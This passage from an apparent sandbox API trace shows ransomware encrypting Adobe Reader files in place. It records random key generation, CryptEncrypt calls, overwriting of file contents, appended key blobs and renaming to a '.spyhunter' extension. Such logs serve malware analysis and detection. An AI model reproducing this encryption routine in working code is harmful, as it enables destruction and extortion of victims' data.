lpNumberOfBytesWritten=0x57f93c, lpOverlapped=0x0 | out: lpBuffer=0x57f97c*, lpNumberOfBytesWritten=0x57f93c*=0x4, lpOverlapped=0x0) returned 1 [0114.302] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f93c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f93c*=0x30, lpOverlapped=0x0) returned 1 [0114.302] CloseHandle (hObject=0x120) returned 1 [0114.302] GetProcessHeap () returned 0x2c0000 [0114.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.302] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\DefaultID.pdf.spyhunter") returned 91 [0114.303] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\DefaultID.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\defaultid.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CAT\\DefaultID.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\cat\\defaultid.pdf.spyhunter")) returned 1 [0114.303] GetProcessHeap () returned 0x2c0000 [0114.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.303] GetProcessHeap () returned 0x2c0000 [0114.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0114.303] GetProcessHeap () returned 0x2c0000 [0114.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e41288 | out: hHeap=0x2c0000) returned 1 [0114.354] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f978 | out: pbBuffer=0x57f978) returned 1 [0114.354] GetProcessHeap () returned 0x2c0000 [0114.354] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0114.355] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f970*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f970*=0x30) returned 1 [0114.355] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\JSByteCodeWin.bin" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\javascripts\\jsbytecodewin.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0114.355] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\JSByteCodeWin.bin") returned 81 [0114.355] StrStrW (lpFirst="JSByteCodeWin.bin", lpSrch=".txt") returned 0x0 [0114.355] GetProcessHeap () returned 0x2c0000 [0114.355] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0114.355] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f934, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f934*=0x2800, lpOverlapped=0x0) returned 1 [0114.432] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.432] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f934, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f934*=0x2800, lpOverlapped=0x0) returned 1 [0114.432] GetProcessHeap () returned 0x2c0000 [0114.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0114.432] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.432] WriteFile (in: hFile=0x120, lpBuffer=0x57f974*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f934, lpOverlapped=0x0 | out: lpBuffer=0x57f974*, lpNumberOfBytesWritten=0x57f934*=0x4, lpOverlapped=0x0) returned 1 [0114.558] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f934, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f934*=0x30, lpOverlapped=0x0) returned 1 [0114.558] CloseHandle (hObject=0x120) returned 1 [0114.558] GetProcessHeap () returned 0x2c0000 [0114.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.558] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\JSByteCodeWin.bin.spyhunter") returned 91 [0114.558] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\JSByteCodeWin.bin" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\javascripts\\jsbytecodewin.bin"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Javascripts\\JSByteCodeWin.bin.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\javascripts\\jsbytecodewin.bin.spyhunter")) returned 1 [0114.559] GetProcessHeap () returned 0x2c0000 [0114.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.559] GetProcessHeap () returned 0x2c0000 [0114.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0114.559] GetProcessHeap () returned 0x2c0000 [0114.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e191e8 | out: hHeap=0x2c0000) returned 1 [0114.559] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f970 | out: pbBuffer=0x57f970) returned 1 [0114.559] GetProcessHeap () returned 0x2c0000 [0114.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0114.559] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f968*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f968*=0x30) returned 1 [0114.559] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0114.560] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\eula.ini") returned 70 [0114.560] StrStrW (lpFirst="eula.ini", lpSrch=".txt") returned 0x0 [0114.560] GetProcessHeap () returned 0x2c0000 [0114.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0114.560] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f92c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f92c*=0x48e, lpOverlapped=0x0) returned 1 [0114.565] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xfffffb72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.565] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x48e, lpNumberOfBytesWritten=0x57f92c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f92c*=0x48e, lpOverlapped=0x0) returned 1 [0114.566] GetProcessHeap () returned 0x2c0000 [0114.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0114.566] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.566] WriteFile (in: hFile=0x120, lpBuffer=0x57f96c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f92c, lpOverlapped=0x0 | out: lpBuffer=0x57f96c*, lpNumberOfBytesWritten=0x57f92c*=0x4, lpOverlapped=0x0) returned 1 [0114.566] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f92c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f92c*=0x30, lpOverlapped=0x0) returned 1 [0114.566] CloseHandle (hObject=0x120) returned 1 [0114.566] GetProcessHeap () returned 0x2c0000 [0114.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.566] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\eula.ini.spyhunter") returned 80 [0114.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\eula.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\eula.ini.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\eula.ini.spyhunter")) returned 1 [0114.567] GetProcessHeap () returned 0x2c0000 [0114.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.567] GetProcessHeap () returned 0x2c0000 [0114.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0114.567] GetProcessHeap () returned 0x2c0000 [0114.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3e788 | out: hHeap=0x2c0000) returned 1 [0114.569] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f968 | out: pbBuffer=0x57f968) returned 1 [0114.569] GetProcessHeap () returned 0x2c0000 [0114.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0114.569] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f960*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f960*=0x30) returned 1 [0114.569] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0114.569] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\license.html") returned 74 [0114.569] StrStrW (lpFirst="license.html", lpSrch=".txt") returned 0x0 [0114.569] GetProcessHeap () returned 0x2c0000 [0114.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0114.569] ReadFile (in: hFile=0x120, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f924, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f924*=0x2800, lpOverlapped=0x0) returned 1 [0114.607] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.607] WriteFile (in: hFile=0x120, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f924, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f924*=0x2800, lpOverlapped=0x0) returned 1 [0114.706] GetProcessHeap () returned 0x2c0000 [0114.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0114.712] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.712] WriteFile (in: hFile=0x120, lpBuffer=0x57f964*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f924, lpOverlapped=0x0 | out: lpBuffer=0x57f964*, lpNumberOfBytesWritten=0x57f924*=0x4, lpOverlapped=0x0) returned 1 [0114.712] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f924, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f924*=0x30, lpOverlapped=0x0) returned 1 [0114.712] CloseHandle (hObject=0x120) returned 1 [0114.712] GetProcessHeap () returned 0x2c0000 [0114.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e76f38 [0114.713] wnsprintfW (in: pszDest=0x2e76f38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\license.html.spyhunter") returned 84 [0114.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\license.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\license.html.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\license.html.spyhunter")) returned 1 [0114.758] GetProcessHeap () returned 0x2c0000 [0114.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e76f38 | out: hHeap=0x2c0000) returned 1 [0114.758] GetProcessHeap () returned 0x2c0000 [0114.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0114.758] GetProcessHeap () returned 0x2c0000 [0114.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e36520 | out: hHeap=0x2c0000) returned 1 [0114.759] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f960 | out: pbBuffer=0x57f960) returned 1 [0114.759] GetProcessHeap () returned 0x2c0000 [0114.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0114.759] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f958*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f958*=0x30) returned 1 [0114.760] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\kor\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0114.761] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\license.html") returned 74 [0114.761] StrStrW (lpFirst="license.html", lpSrch=".txt") returned 0x0 [0114.761] GetProcessHeap () returned 0x2c0000 [0114.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0114.761] ReadFile (in: hFile=0x120, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f91c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57f91c*=0x2800, lpOverlapped=0x0) returned 1 [0114.821] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.821] WriteFile (in: hFile=0x120, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f91c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57f91c*=0x2800, lpOverlapped=0x0) returned 1 [0114.822] GetProcessHeap () returned 0x2c0000 [0114.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0114.822] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.822] WriteFile (in: hFile=0x120, lpBuffer=0x57f95c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f91c, lpOverlapped=0x0 | out: lpBuffer=0x57f95c*, lpNumberOfBytesWritten=0x57f91c*=0x4, lpOverlapped=0x0) returned 1 [0114.826] WriteFile (in: hFile=0x120, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f91c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f91c*=0x30, lpOverlapped=0x0) returned 1 [0114.826] CloseHandle (hObject=0x120) returned 1 [0114.839] GetProcessHeap () returned 0x2c0000 [0114.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.839] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\license.html.spyhunter") returned 84 [0114.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\kor\\license.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\license.html.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\kor\\license.html.spyhunter")) returned 1 [0114.840] GetProcessHeap () returned 0x2c0000 [0114.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.840] GetProcessHeap () returned 0x2c0000 [0114.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0114.840] GetProcessHeap () returned 0x2c0000 [0114.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e36600 | out: hHeap=0x2c0000) returned 1 [0114.840] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f960 | out: pbBuffer=0x57f960) returned 1 [0114.840] GetProcessHeap () returned 0x2c0000 [0114.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0114.840] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f958*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f958*=0x30) returned 1 [0114.840] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0114.841] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\eula.ini") returned 70 [0114.841] StrStrW (lpFirst="eula.ini", lpSrch=".txt") returned 0x0 [0114.841] GetProcessHeap () returned 0x2c0000 [0114.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0114.841] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f91c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f91c*=0x41e, lpOverlapped=0x0) returned 1 [0114.845] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffbe2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.845] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41e, lpNumberOfBytesWritten=0x57f91c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f91c*=0x41e, lpOverlapped=0x0) returned 1 [0114.845] GetProcessHeap () returned 0x2c0000 [0114.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0114.845] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.845] WriteFile (in: hFile=0xb4, lpBuffer=0x57f95c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f91c, lpOverlapped=0x0 | out: lpBuffer=0x57f95c*, lpNumberOfBytesWritten=0x57f91c*=0x4, lpOverlapped=0x0) returned 1 [0114.845] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f91c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f91c*=0x30, lpOverlapped=0x0) returned 1 [0114.845] CloseHandle (hObject=0xb4) returned 1 [0114.845] GetProcessHeap () returned 0x2c0000 [0114.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.846] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\eula.ini.spyhunter") returned 80 [0114.846] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\eula.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\TUR\\eula.ini.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\tur\\eula.ini.spyhunter")) returned 1 [0114.846] GetProcessHeap () returned 0x2c0000 [0114.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.846] GetProcessHeap () returned 0x2c0000 [0114.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0114.847] GetProcessHeap () returned 0x2c0000 [0114.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0dd88 | out: hHeap=0x2c0000) returned 1 [0114.848] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f958 | out: pbBuffer=0x57f958) returned 1 [0114.848] GetProcessHeap () returned 0x2c0000 [0114.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0114.848] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57f950*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57f950*=0x30) returned 1 [0114.848] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0114.849] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\license.html") returned 74 [0114.849] StrStrW (lpFirst="license.html", lpSrch=".txt") returned 0x0 [0114.849] GetProcessHeap () returned 0x2c0000 [0114.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0114.849] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f914, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f914*=0x2800, lpOverlapped=0x0) returned 1 [0114.963] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.964] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f914, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f914*=0x2800, lpOverlapped=0x0) returned 1 [0114.964] GetProcessHeap () returned 0x2c0000 [0114.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0114.964] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.964] WriteFile (in: hFile=0xb4, lpBuffer=0x57f954*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f914, lpOverlapped=0x0 | out: lpBuffer=0x57f954*, lpNumberOfBytesWritten=0x57f914*=0x4, lpOverlapped=0x0) returned 1 [0114.967] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f914, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57f914*=0x30, lpOverlapped=0x0) returned 1 [0114.967] CloseHandle (hObject=0xb4) returned 1 [0114.967] GetProcessHeap () returned 0x2c0000 [0114.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.968] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\license.html.spyhunter") returned 84 [0114.968] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\license.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SVE\\license.html.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\sve\\license.html.spyhunter")) returned 1 [0114.979] GetProcessHeap () returned 0x2c0000 [0114.979] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 